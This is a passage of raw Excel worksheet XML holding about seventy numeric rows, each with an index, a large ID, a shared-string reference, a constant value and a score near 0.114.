      <c r="D24325" s="2">
        <v>1.0</v>
      </c>
      <c r="E24325" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24325" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="24326" ht="15.75" customHeight="1">
      <c r="A24326" s="1">
        <v>22856.0</v>
      </c>
      <c r="B24326" s="2">
        <v>4.7082247E7</v>
      </c>
      <c r="C24326" s="2" t="s">
        <v>23426</v>
      </c>
      <c r="D24326" s="2">
        <v>1.0</v>
      </c>
      <c r="E24326" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24326" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="24327" ht="15.75" customHeight="1">
      <c r="A24327" s="1">
        <v>26554.0</v>
      </c>
      <c r="B24327" s="2">
        <v>1.7800514E7</v>
      </c>
      <c r="C24327" s="2" t="s">
        <v>23325</v>
      </c>
      <c r="D24327" s="2">
        <v>1.0</v>
      </c>
      <c r="E24327" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24327" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="24328" ht="15.75" customHeight="1">
      <c r="A24328" s="1">
        <v>28880.0</v>
      </c>
      <c r="B24328" s="2">
        <v>2.9170761E7</v>
      </c>
      <c r="C24328" s="2" t="s">
        <v>23427</v>
      </c>
      <c r="D24328" s="2">
        <v>1.0</v>
      </c>
      <c r="E24328" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24328" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="24329" ht="15.75" customHeight="1">
      <c r="A24329" s="1">
        <v>1160.0</v>
      </c>
      <c r="B24329" s="2">
        <v>2.4478583E7</v>
      </c>
      <c r="C24329" s="2" t="s">
        <v>23428</v>
      </c>
      <c r="D24329" s="2">
        <v>1.0</v>
      </c>
      <c r="E24329" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24329" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24330" ht="15.75" customHeight="1">
      <c r="A24330" s="1">
        <v>1169.0</v>
      </c>
      <c r="B24330" s="2">
        <v>2.4581659E7</v>
      </c>
      <c r="C24330" s="2" t="s">
        <v>23429</v>
      </c>
      <c r="D24330" s="2">
        <v>1.0</v>
      </c>
      <c r="E24330" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24330" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24331" ht="15.75" customHeight="1">
      <c r="A24331" s="1">
        <v>1280.0</v>
      </c>
      <c r="B24331" s="2">
        <v>2.5534742E7</v>
      </c>
      <c r="C24331" s="2" t="s">
        <v>23430</v>
      </c>
      <c r="D24331" s="2">
        <v>1.0</v>
      </c>
      <c r="E24331" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24331" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24332" ht="15.75" customHeight="1">
      <c r="A24332" s="1">
        <v>1861.0</v>
      </c>
      <c r="B24332" s="2">
        <v>2.949634E7</v>
      </c>
      <c r="C24332" s="2" t="s">
        <v>23431</v>
      </c>
      <c r="D24332" s="2">
        <v>1.0</v>
      </c>
      <c r="E24332" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24332" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24333" ht="15.75" customHeight="1">
      <c r="A24333" s="1">
        <v>3694.0</v>
      </c>
      <c r="B24333" s="2">
        <v>3.9530194E7</v>
      </c>
      <c r="C24333" s="2" t="s">
        <v>23432</v>
      </c>
      <c r="D24333" s="2">
        <v>1.0</v>
      </c>
      <c r="E24333" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24333" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24334" ht="15.75" customHeight="1">
      <c r="A24334" s="1">
        <v>3983.0</v>
      </c>
      <c r="B24334" s="2">
        <v>4.0837571E7</v>
      </c>
      <c r="C24334" s="2" t="s">
        <v>23433</v>
      </c>
      <c r="D24334" s="2">
        <v>1.0</v>
      </c>
      <c r="E24334" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24334" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24335" ht="15.75" customHeight="1">
      <c r="A24335" s="1">
        <v>4528.0</v>
      </c>
      <c r="B24335" s="2">
        <v>4.2616392E7</v>
      </c>
      <c r="C24335" s="2" t="s">
        <v>23434</v>
      </c>
      <c r="D24335" s="2">
        <v>1.0</v>
      </c>
      <c r="E24335" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24335" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24336" ht="15.75" customHeight="1">
      <c r="A24336" s="1">
        <v>6092.0</v>
      </c>
      <c r="B24336" s="2">
        <v>4.7702295E7</v>
      </c>
      <c r="C24336" s="2" t="s">
        <v>23435</v>
      </c>
      <c r="D24336" s="2">
        <v>1.0</v>
      </c>
      <c r="E24336" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24336" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24337" ht="15.75" customHeight="1">
      <c r="A24337" s="1">
        <v>6432.0</v>
      </c>
      <c r="B24337" s="2">
        <v>4.8581402E7</v>
      </c>
      <c r="C24337" s="2" t="s">
        <v>23436</v>
      </c>
      <c r="D24337" s="2">
        <v>1.0</v>
      </c>
      <c r="E24337" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24337" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24338" ht="15.75" customHeight="1">
      <c r="A24338" s="1">
        <v>7318.0</v>
      </c>
      <c r="B24338" s="2">
        <v>5.08793E7</v>
      </c>
      <c r="C24338" s="2" t="s">
        <v>23437</v>
      </c>
      <c r="D24338" s="2">
        <v>1.0</v>
      </c>
      <c r="E24338" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24338" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24339" ht="15.75" customHeight="1">
      <c r="A24339" s="1">
        <v>7918.0</v>
      </c>
      <c r="B24339" s="2">
        <v>5.2518364E7</v>
      </c>
      <c r="C24339" s="2" t="s">
        <v>23438</v>
      </c>
      <c r="D24339" s="2">
        <v>1.0</v>
      </c>
      <c r="E24339" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24339" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24340" ht="15.75" customHeight="1">
      <c r="A24340" s="1">
        <v>7995.0</v>
      </c>
      <c r="B24340" s="2">
        <v>5.2774282E7</v>
      </c>
      <c r="C24340" s="2" t="s">
        <v>23439</v>
      </c>
      <c r="D24340" s="2">
        <v>1.0</v>
      </c>
      <c r="E24340" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24340" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24341" ht="15.75" customHeight="1">
      <c r="A24341" s="1">
        <v>10164.0</v>
      </c>
      <c r="B24341" s="2">
        <v>5.7345571E7</v>
      </c>
      <c r="C24341" s="2" t="s">
        <v>23440</v>
      </c>
      <c r="D24341" s="2">
        <v>1.0</v>
      </c>
      <c r="E24341" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24341" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24342" ht="15.75" customHeight="1">
      <c r="A24342" s="1">
        <v>10215.0</v>
      </c>
      <c r="B24342" s="2">
        <v>5.7434949E7</v>
      </c>
      <c r="C24342" s="2" t="s">
        <v>23441</v>
      </c>
      <c r="D24342" s="2">
        <v>1.0</v>
      </c>
      <c r="E24342" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24342" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24343" ht="15.75" customHeight="1">
      <c r="A24343" s="1">
        <v>10358.0</v>
      </c>
      <c r="B24343" s="2">
        <v>7288700.0</v>
      </c>
      <c r="C24343" s="2" t="s">
        <v>23442</v>
      </c>
      <c r="D24343" s="2">
        <v>1.0</v>
      </c>
      <c r="E24343" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24343" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24344" ht="15.75" customHeight="1">
      <c r="A24344" s="1">
        <v>10417.0</v>
      </c>
      <c r="B24344" s="2">
        <v>1.0079595E7</v>
      </c>
      <c r="C24344" s="2" t="s">
        <v>23443</v>
      </c>
      <c r="D24344" s="2">
        <v>1.0</v>
      </c>
      <c r="E24344" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24344" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24345" ht="15.75" customHeight="1">
      <c r="A24345" s="1">
        <v>10569.0</v>
      </c>
      <c r="B24345" s="2">
        <v>1.2937635E7</v>
      </c>
      <c r="C24345" s="2" t="s">
        <v>23444</v>
      </c>
      <c r="D24345" s="2">
        <v>1.0</v>
      </c>
      <c r="E24345" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24345" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24346" ht="15.75" customHeight="1">
      <c r="A24346" s="1">
        <v>10837.0</v>
      </c>
      <c r="B24346" s="2">
        <v>1.5998557E7</v>
      </c>
      <c r="C24346" s="2" t="s">
        <v>23445</v>
      </c>
      <c r="D24346" s="2">
        <v>1.0</v>
      </c>
      <c r="E24346" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24346" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24347" ht="15.75" customHeight="1">
      <c r="A24347" s="1">
        <v>11633.0</v>
      </c>
      <c r="B24347" s="2">
        <v>2.3169411E7</v>
      </c>
      <c r="C24347" s="2" t="s">
        <v>23446</v>
      </c>
      <c r="D24347" s="2">
        <v>1.0</v>
      </c>
      <c r="E24347" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24347" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24348" ht="15.75" customHeight="1">
      <c r="A24348" s="1">
        <v>12745.0</v>
      </c>
      <c r="B24348" s="2">
        <v>3.1088888E7</v>
      </c>
      <c r="C24348" s="2" t="s">
        <v>23447</v>
      </c>
      <c r="D24348" s="2">
        <v>1.0</v>
      </c>
      <c r="E24348" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24348" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24349" ht="15.75" customHeight="1">
      <c r="A24349" s="1">
        <v>13387.0</v>
      </c>
      <c r="B24349" s="2">
        <v>3.4933735E7</v>
      </c>
      <c r="C24349" s="2" t="s">
        <v>23448</v>
      </c>
      <c r="D24349" s="2">
        <v>1.0</v>
      </c>
      <c r="E24349" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24349" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24350" ht="15.75" customHeight="1">
      <c r="A24350" s="1">
        <v>13395.0</v>
      </c>
      <c r="B24350" s="2">
        <v>3.4963448E7</v>
      </c>
      <c r="C24350" s="2" t="s">
        <v>23449</v>
      </c>
      <c r="D24350" s="2">
        <v>1.0</v>
      </c>
      <c r="E24350" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24350" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24351" ht="15.75" customHeight="1">
      <c r="A24351" s="1">
        <v>16887.0</v>
      </c>
      <c r="B24351" s="2">
        <v>4.8016621E7</v>
      </c>
      <c r="C24351" s="2" t="s">
        <v>23450</v>
      </c>
      <c r="D24351" s="2">
        <v>1.0</v>
      </c>
      <c r="E24351" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24351" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24352" ht="15.75" customHeight="1">
      <c r="A24352" s="1">
        <v>16937.0</v>
      </c>
      <c r="B24352" s="2">
        <v>4.8189724E7</v>
      </c>
      <c r="C24352" s="2" t="s">
        <v>23451</v>
      </c>
      <c r="D24352" s="2">
        <v>1.0</v>
      </c>
      <c r="E24352" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24352" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24353" ht="15.75" customHeight="1">
      <c r="A24353" s="1">
        <v>17313.0</v>
      </c>
      <c r="B24353" s="2">
        <v>4.9317704E7</v>
      </c>
      <c r="C24353" s="2" t="s">
        <v>23452</v>
      </c>
      <c r="D24353" s="2">
        <v>1.0</v>
      </c>
      <c r="E24353" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24353" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24354" ht="15.75" customHeight="1">
      <c r="A24354" s="1">
        <v>17466.0</v>
      </c>
      <c r="B24354" s="2">
        <v>4.9878183E7</v>
      </c>
      <c r="C24354" s="2" t="s">
        <v>23453</v>
      </c>
      <c r="D24354" s="2">
        <v>1.0</v>
      </c>
      <c r="E24354" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24354" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24355" ht="15.75" customHeight="1">
      <c r="A24355" s="1">
        <v>18188.0</v>
      </c>
      <c r="B24355" s="2">
        <v>5.2026132E7</v>
      </c>
      <c r="C24355" s="2" t="s">
        <v>23454</v>
      </c>
      <c r="D24355" s="2">
        <v>1.0</v>
      </c>
      <c r="E24355" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24355" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24356" ht="15.75" customHeight="1">
      <c r="A24356" s="1">
        <v>18534.0</v>
      </c>
      <c r="B24356" s="2">
        <v>5.3100155E7</v>
      </c>
      <c r="C24356" s="2" t="s">
        <v>23455</v>
      </c>
      <c r="D24356" s="2">
        <v>1.0</v>
      </c>
      <c r="E24356" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24356" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24357" ht="15.75" customHeight="1">
      <c r="A24357" s="1">
        <v>19246.0</v>
      </c>
      <c r="B24357" s="2">
        <v>5.5105474E7</v>
      </c>
      <c r="C24357" s="2" t="s">
        <v>23456</v>
      </c>
      <c r="D24357" s="2">
        <v>1.0</v>
      </c>
      <c r="E24357" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24357" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24358" ht="15.75" customHeight="1">
      <c r="A24358" s="1">
        <v>19347.0</v>
      </c>
      <c r="B24358" s="2">
        <v>5.5385555E7</v>
      </c>
      <c r="C24358" s="2" t="s">
        <v>23457</v>
      </c>
      <c r="D24358" s="2">
        <v>1.0</v>
      </c>
      <c r="E24358" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24358" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24359" ht="15.75" customHeight="1">
      <c r="A24359" s="1">
        <v>20733.0</v>
      </c>
      <c r="B24359" s="2">
        <v>1.4717609E7</v>
      </c>
      <c r="C24359" s="2" t="s">
        <v>23458</v>
      </c>
      <c r="D24359" s="2">
        <v>1.0</v>
      </c>
      <c r="E24359" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24359" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24360" ht="15.75" customHeight="1">
      <c r="A24360" s="1">
        <v>20756.0</v>
      </c>
      <c r="B24360" s="2">
        <v>1.4891617E7</v>
      </c>
      <c r="C24360" s="2" t="s">
        <v>23459</v>
      </c>
      <c r="D24360" s="2">
        <v>1.0</v>
      </c>
      <c r="E24360" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24360" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24361" ht="15.75" customHeight="1">
      <c r="A24361" s="1">
        <v>21056.0</v>
      </c>
      <c r="B24361" s="2">
        <v>1.7783794E7</v>
      </c>
      <c r="C24361" s="2" t="s">
        <v>23460</v>
      </c>
      <c r="D24361" s="2">
        <v>1.0</v>
      </c>
      <c r="E24361" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24361" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24362" ht="15.75" customHeight="1">
      <c r="A24362" s="1">
        <v>21318.0</v>
      </c>
      <c r="B24362" s="2">
        <v>2.0885548E7</v>
      </c>
      <c r="C24362" s="2" t="s">
        <v>23461</v>
      </c>
      <c r="D24362" s="2">
        <v>1.0</v>
      </c>
      <c r="E24362" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24362" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24363" ht="15.75" customHeight="1">
      <c r="A24363" s="1">
        <v>21448.0</v>
      </c>
      <c r="B24363" s="2">
        <v>2.2435759E7</v>
      </c>
      <c r="C24363" s="2" t="s">
        <v>23462</v>
      </c>
      <c r="D24363" s="2">
        <v>1.0</v>
      </c>
      <c r="E24363" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24363" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24364" ht="15.75" customHeight="1">
      <c r="A24364" s="1">
        <v>21578.0</v>
      </c>
      <c r="B24364" s="2">
        <v>2.3846992E7</v>
      </c>
      <c r="C24364" s="2" t="s">
        <v>23463</v>
      </c>
      <c r="D24364" s="2">
        <v>1.0</v>
      </c>
      <c r="E24364" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24364" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24365" ht="15.75" customHeight="1">
      <c r="A24365" s="1">
        <v>21765.0</v>
      </c>
      <c r="B24365" s="2">
        <v>2.6268097E7</v>
      </c>
      <c r="C24365" s="2" t="s">
        <v>23464</v>
      </c>
      <c r="D24365" s="2">
        <v>1.0</v>
      </c>
      <c r="E24365" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24365" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24366" ht="15.75" customHeight="1">
      <c r="A24366" s="1">
        <v>21862.0</v>
      </c>
      <c r="B24366" s="2">
        <v>2.7338002E7</v>
      </c>
      <c r="C24366" s="2" t="s">
        <v>23465</v>
      </c>
      <c r="D24366" s="2">
        <v>1.0</v>
      </c>
      <c r="E24366" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24366" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24367" ht="15.75" customHeight="1">
      <c r="A24367" s="1">
        <v>21976.0</v>
      </c>
      <c r="B24367" s="2">
        <v>2.9170762E7</v>
      </c>
      <c r="C24367" s="2" t="s">
        <v>23466</v>
      </c>
      <c r="D24367" s="2">
        <v>1.0</v>
      </c>
      <c r="E24367" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24367" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24368" ht="15.75" customHeight="1">
      <c r="A24368" s="1">
        <v>22105.0</v>
      </c>
      <c r="B24368" s="2">
        <v>3.0858356E7</v>
      </c>
      <c r="C24368" s="2" t="s">
        <v>23467</v>
      </c>
      <c r="D24368" s="2">
        <v>1.0</v>
      </c>
      <c r="E24368" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24368" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24369" ht="15.75" customHeight="1">
      <c r="A24369" s="1">
        <v>22148.0</v>
      </c>
      <c r="B24369" s="2">
        <v>3.1264418E7</v>
      </c>
      <c r="C24369" s="2" t="s">
        <v>23468</v>
      </c>
      <c r="D24369" s="2">
        <v>1.0</v>
      </c>
      <c r="E24369" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24369" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24370" ht="15.75" customHeight="1">
      <c r="A24370" s="1">
        <v>22356.0</v>
      </c>
      <c r="B24370" s="2">
        <v>3.4579334E7</v>
      </c>
      <c r="C24370" s="2" t="s">
        <v>23469</v>
      </c>
      <c r="D24370" s="2">
        <v>1.0</v>
      </c>
      <c r="E24370" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24370" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24371" ht="15.75" customHeight="1">
      <c r="A24371" s="1">
        <v>22684.0</v>
      </c>
      <c r="B24371" s="2">
        <v>4.2153345E7</v>
      </c>
      <c r="C24371" s="2" t="s">
        <v>23470</v>
      </c>
      <c r="D24371" s="2">
        <v>1.0</v>
      </c>
      <c r="E24371" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24371" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24372" ht="15.75" customHeight="1">
      <c r="A24372" s="1">
        <v>22699.0</v>
      </c>
      <c r="B24372" s="2">
        <v>4.2471286E7</v>
      </c>
      <c r="C24372" s="2" t="s">
        <v>23471</v>
      </c>
      <c r="D24372" s="2">
        <v>1.0</v>
      </c>
      <c r="E24372" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24372" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24373" ht="15.75" customHeight="1">
      <c r="A24373" s="1">
        <v>22967.0</v>
      </c>
      <c r="B24373" s="2">
        <v>4.9188146E7</v>
      </c>
      <c r="C24373" s="2" t="s">
        <v>23472</v>
      </c>
      <c r="D24373" s="2">
        <v>1.0</v>
      </c>
      <c r="E24373" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24373" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24374" ht="15.75" customHeight="1">
      <c r="A24374" s="1">
        <v>23201.0</v>
      </c>
      <c r="B24374" s="2">
        <v>5.2484715E7</v>
      </c>
      <c r="C24374" s="2" t="s">
        <v>23473</v>
      </c>
      <c r="D24374" s="2">
        <v>1.0</v>
      </c>
      <c r="E24374" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24374" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24375" ht="15.75" customHeight="1">
      <c r="A24375" s="1">
        <v>23350.0</v>
      </c>
      <c r="B24375" s="2">
        <v>5484717.0</v>
      </c>
      <c r="C24375" s="2" t="s">
        <v>23474</v>
      </c>
      <c r="D24375" s="2">
        <v>1.0</v>
      </c>
      <c r="E24375" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24375" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24376" ht="15.75" customHeight="1">
      <c r="A24376" s="1">
        <v>23821.0</v>
      </c>
      <c r="B24376" s="2">
        <v>7994163.0</v>
      </c>
      <c r="C24376" s="2" t="s">
        <v>23378</v>
      </c>
      <c r="D24376" s="2">
        <v>1.0</v>
      </c>
      <c r="E24376" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24376" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24377" ht="15.75" customHeight="1">
      <c r="A24377" s="1">
        <v>24190.0</v>
      </c>
      <c r="B24377" s="2">
        <v>1.0276009E7</v>
      </c>
      <c r="C24377" s="2" t="s">
        <v>23475</v>
      </c>
      <c r="D24377" s="2">
        <v>1.0</v>
      </c>
      <c r="E24377" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24377" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24378" ht="15.75" customHeight="1">
      <c r="A24378" s="1">
        <v>24471.0</v>
      </c>
      <c r="B24378" s="2">
        <v>1.0986314E7</v>
      </c>
      <c r="C24378" s="2" t="s">
        <v>23476</v>
      </c>
      <c r="D24378" s="2">
        <v>1.0</v>
      </c>
      <c r="E24378" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24378" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24379" ht="15.75" customHeight="1">
      <c r="A24379" s="1">
        <v>25143.0</v>
      </c>
      <c r="B24379" s="2">
        <v>1.3029614E7</v>
      </c>
      <c r="C24379" s="2" t="s">
        <v>23477</v>
      </c>
      <c r="D24379" s="2">
        <v>1.0</v>
      </c>
      <c r="E24379" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24379" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24380" ht="15.75" customHeight="1">
      <c r="A24380" s="1">
        <v>25251.0</v>
      </c>
      <c r="B24380" s="2">
        <v>1.3382562E7</v>
      </c>
      <c r="C24380" s="2" t="s">
        <v>23478</v>
      </c>
      <c r="D24380" s="2">
        <v>1.0</v>
      </c>
      <c r="E24380" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24380" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24381" ht="15.75" customHeight="1">
      <c r="A24381" s="1">
        <v>25571.0</v>
      </c>
      <c r="B24381" s="2">
        <v>1.433177E7</v>
      </c>
      <c r="C24381" s="2" t="s">
        <v>23468</v>
      </c>
      <c r="D24381" s="2">
        <v>1.0</v>
      </c>
      <c r="E24381" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24381" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24382" ht="15.75" customHeight="1">
      <c r="A24382" s="1">
        <v>25864.0</v>
      </c>
      <c r="B24382" s="2">
        <v>1.4891616E7</v>
      </c>
      <c r="C24382" s="2" t="s">
        <v>23459</v>
      </c>
      <c r="D24382" s="2">
        <v>1.0</v>
      </c>
      <c r="E24382" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24382" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24383" ht="15.75" customHeight="1">
      <c r="A24383" s="1">
        <v>26044.0</v>
      </c>
      <c r="B24383" s="2">
        <v>1.5476932E7</v>
      </c>
      <c r="C24383" s="2" t="s">
        <v>23479</v>
      </c>
      <c r="D24383" s="2">
        <v>1.0</v>
      </c>
      <c r="E24383" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24383" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24384" ht="15.75" customHeight="1">
      <c r="A24384" s="1">
        <v>26184.0</v>
      </c>
      <c r="B24384" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C24384" s="2" t="s">
        <v>23480</v>
      </c>
      <c r="D24384" s="2">
        <v>1.0</v>
      </c>
      <c r="E24384" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24384" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24385" ht="15.75" customHeight="1">
      <c r="A24385" s="1">
        <v>26558.0</v>
      </c>
      <c r="B24385" s="2">
        <v>1.7803591E7</v>
      </c>
      <c r="C24385" s="2" t="s">
        <v>23481</v>
      </c>
      <c r="D24385" s="2">
        <v>1.0</v>
      </c>
      <c r="E24385" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24385" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24386" ht="15.75" customHeight="1">
      <c r="A24386" s="1">
        <v>27187.0</v>
      </c>
      <c r="B24386" s="2">
        <v>2.0885547E7</v>
      </c>
      <c r="C24386" s="2" t="s">
        <v>23461</v>
      </c>
      <c r="D24386" s="2">
        <v>1.0</v>
      </c>
      <c r="E24386" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24386" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24387" ht="15.75" customHeight="1">
      <c r="A24387" s="1">
        <v>27283.0</v>
      </c>
      <c r="B24387" s="2">
        <v>2.1239026E7</v>
      </c>
      <c r="C24387" s="2" t="s">
        <v>23482</v>
      </c>
      <c r="D24387" s="2">
        <v>1.0</v>
      </c>
      <c r="E24387" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24387" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24388" ht="15.75" customHeight="1">
      <c r="A24388" s="1">
        <v>27291.0</v>
      </c>
      <c r="B24388" s="2">
        <v>2.1244333E7</v>
      </c>
      <c r="C24388" s="2" t="s">
        <v>23483</v>
      </c>
      <c r="D24388" s="2">
        <v>1.0</v>
      </c>
      <c r="E24388" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24388" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24389" ht="15.75" customHeight="1">
      <c r="A24389" s="1">
        <v>27318.0</v>
      </c>
      <c r="B24389" s="2">
        <v>2.1377477E7</v>
      </c>
      <c r="C24389" s="2" t="s">
        <v>23484</v>
      </c>
      <c r="D24389" s="2">
        <v>1.0</v>
      </c>
      <c r="E24389" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24389" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24390" ht="15.75" customHeight="1">
      <c r="A24390" s="1">
        <v>27559.0</v>
      </c>
      <c r="B24390" s="2">
        <v>2.2403635E7</v>
      </c>
      <c r="C24390" s="2" t="s">
        <v>23485</v>
      </c>
      <c r="D24390" s="2">
        <v>1.0</v>
      </c>
      <c r="E24390" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24390" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24391" ht="15.75" customHeight="1">
      <c r="A24391" s="1">
        <v>28008.0</v>
      </c>
      <c r="B24391" s="2">
        <v>2.4335313E7</v>
      </c>
      <c r="C24391" s="2" t="s">
        <v>23486</v>
      </c>
      <c r="D24391" s="2">
        <v>1.0</v>
      </c>
      <c r="E24391" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24391" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="24392" ht="15.75" customHeight="1">
      <c r="A24392" s="1">
        <v>28134.0</v>
      </c>
      <c r="B24392" s="2">
        <v>2.4781083E7</v>
      </c>
      <c r="C24392" s="2" t="s">
        <v>23487</v>
      </c>
